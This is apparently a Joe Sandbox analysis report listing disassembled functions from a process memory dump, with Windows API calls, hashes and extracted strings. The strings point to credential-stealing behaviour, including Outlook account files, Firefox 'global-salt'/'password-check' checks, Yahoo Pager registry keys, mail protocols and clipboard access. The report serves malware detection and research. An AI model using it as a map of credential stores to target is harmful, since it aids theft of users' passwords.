                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                    • CloseHandle.KERNEL32(?), ref: 00444206
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                    • String ID: ACD
                    • API String ID: 1886237854-620537770
                    • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                    • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004091EC
                    • sprintf.MSVCRT ref: 00409201
                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                    • SetWindowTextA.USER32(?,?), ref: 00409228
                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                    • String ID: caption$dialog_%d
                    • API String ID: 2923679083-4161923789
                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                    • memset.MSVCRT ref: 00410246
                    • memset.MSVCRT ref: 00410258
                      • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                    • memset.MSVCRT ref: 0041033F
                    • _mbscpy.MSVCRT ref: 00410364
                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 3974772901-0
                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0044406C
                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                    • strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                    • memcpy.MSVCRT ref: 004440EB
                    • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                    • String ID:
                    • API String ID: 577244452-0
                    • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                    • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • _strcmpi.MSVCRT ref: 00404518
                    • _strcmpi.MSVCRT ref: 00404536
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$memcpystrlen
                    • String ID: imap$pop3$smtp
                    • API String ID: 2025310588-821077329
                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040C02D
                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                      • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                      • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                      • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2726666094-3614832568
                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                    Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                    • OpenClipboard.USER32(?), ref: 0040C1B1
                    • GetLastError.KERNEL32 ref: 0040C1CA
                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                    • String ID:
                    • API String ID: 2014771361-0
                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    • memcmp.MSVCRT ref: 00406151
                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                      • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                    • memcmp.MSVCRT ref: 0040617C
                    • memcmp.MSVCRT ref: 004061A4
                    • memcpy.MSVCRT ref: 004061C1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID: global-salt$password-check
                    • API String ID: 231171946-3927197501
                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                    • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004016A3
                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                    • BeginPaint.USER32(?,?), ref: 004016D7
                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                    • EndPaint.USER32(?,?), ref: 004016F3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                    • String ID:
                    • API String ID: 19018683-0
                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040644F
                    • memcpy.MSVCRT ref: 00406462
                    • memcpy.MSVCRT ref: 00406475
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                      • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                    • memcpy.MSVCRT ref: 004064B9
                    • memcpy.MSVCRT ref: 004064CC
                    • memcpy.MSVCRT ref: 004064F9
                    • memcpy.MSVCRT ref: 0040650E
                      • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                    • memset.MSVCRT ref: 0040330B
                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                    • strchr.MSVCRT ref: 0040335A
                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                    • strlen.MSVCRT ref: 0040339C
                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                    • String ID: Personalities
                    • API String ID: 2103853322-4287407858
                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                    Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00444573
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValuememset
                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                    • API String ID: 1830152886-1703613266
                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: H
                    • API String ID: 2221118986-2852464175
                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                    • API String ID: 3510742995-3170954634
                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: winWrite1$winWrite2
                    • API String ID: 438689982-3457389245
                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: winRead
                    • API String ID: 1297977491-2759563040
                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 004090C2
                    • GetWindowRect.USER32(?,?), ref: 004090CF
                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                    • GetSysColor.USER32(00000005), ref: 004107A6
                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                    • String ID:
                    • API String ID: 2775283111-0
                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                    Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: winSeekFile$winTruncate1$winTruncate2
                    • API String ID: 885266447-2471937615
                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$_mbscpy
                    • String ID: smtp
                    • API String ID: 2625860049-60245459
                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                    Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                    Download Yara Rule
                    APIs
